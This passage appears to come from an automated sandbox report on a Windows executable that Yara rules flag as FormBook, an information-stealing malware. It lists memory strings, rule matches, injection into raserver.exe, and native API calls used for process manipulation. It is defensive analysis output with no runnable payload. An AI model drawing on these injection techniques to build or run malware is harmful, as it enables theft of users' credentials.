Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/6#
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/G#Por
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/L#Ko
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/aali
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/ana
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/h#wo0
Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/rpor
Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp, hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comte
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: hvEop8Y70Y.exe, 00000000.00000003.240127889.0000000005DC9000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krndo
Source: explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: hvEop8Y70Y.exe, 00000000.00000003.239195731.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com2
Source: hvEop8Y70Y.exe, 00000000.00000003.238931392.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comI
Source: hvEop8Y70Y.exe, 00000000.00000003.239146242.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comc
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match File source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D6D78 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D6D70 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_004181B0 NtCreateFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_00418260 NtReadFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_004182E0 NtClose,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_00418390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015199A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015198F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015195D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015197A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015196E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015199D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0151B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015198A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0151A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519A10 NtQuerySection,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519560 NtWriteFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0151AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015195F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0151A770 NtOpenThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519760 NtOpenProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0151A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01519610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015196D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044EB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044EAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044EA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044EA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044E97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044EA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_003981B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_00398260 NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_003982E0 NtClose,
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_00398390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_008BA9EA
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_008BDCE7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_008BE078
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_02CFC2B0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_02CF9990
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_02D61830
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_02D60448
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D5360
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075DBF98
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D2060
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D78F8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D534F
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D1378
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D2B60
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D8B10
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D2B29
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D8B20
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D1BD8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D8FF2
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D1BE8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D1388
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D1E48
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D1E38
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D7E30
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D19B0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D19A0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D2050
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D0810
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D0801
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D9000
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D78F4
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_075D78AA
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_008BAAC7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 0_2_008BAA54
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_00401030
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0041B960
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0041C212
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0041CB21
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_00408C50
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0041B493
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_00402D88
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_00402D90
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0041CE0C
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0041CF16
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_00402FB0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_009AE078
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_009AA9EA
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_009ADCE7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_014DF900
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_014F4120
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01591002
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A28EC
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_014EB090
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015020A0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A20A8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A2B28
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0159DBD2
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0150EBB0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A22AE
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A1D55
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A2D07
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_014D0D20
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A25DD
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_014ED5E0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_01502581
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0159D466
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_014E841F
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A1FF1
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_0159D616
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_014F6E30
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_015A2EF7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_009AAA54
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: 4_2_009AAAC7
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_0456D466
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_04561002
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044B841F
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_045728EC
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044BB090
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044D20A0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_045720A8
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_04571D55
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044AF900
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_04572D07
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044A0D20
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044C4120
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_045725DD
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044BD5E0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044D2581
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044C6E30
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_04572EF7
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_045722AE
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_04572B28
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_0456DBD2
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_04571FF1
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_044DEBB0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_0039CB21
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_00388C50
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_00382D90
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_00382D88
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_0039CE0C
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_0039CF16
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 14_2_00382FB0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exe Code function: String function: 014DB150 appears 35 times
            Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 044AB150 appears 35 times
            Source: hvEop8Y70Y.exe, 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll" vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000000.00000000.234604097.0000000000952000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameHebrewValue.exe4 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll2 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000000.00000002.272029106.0000000008BE0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000004.00000002.310678097.0000000000A42000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameHebrewValue.exe4 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000004.00000002.311914487.0000000001253000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameraserver.exej% vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000004.00000002.312736573.000000000175F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe Binary or memory string: OriginalFilenameHebrewValue.exe4 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
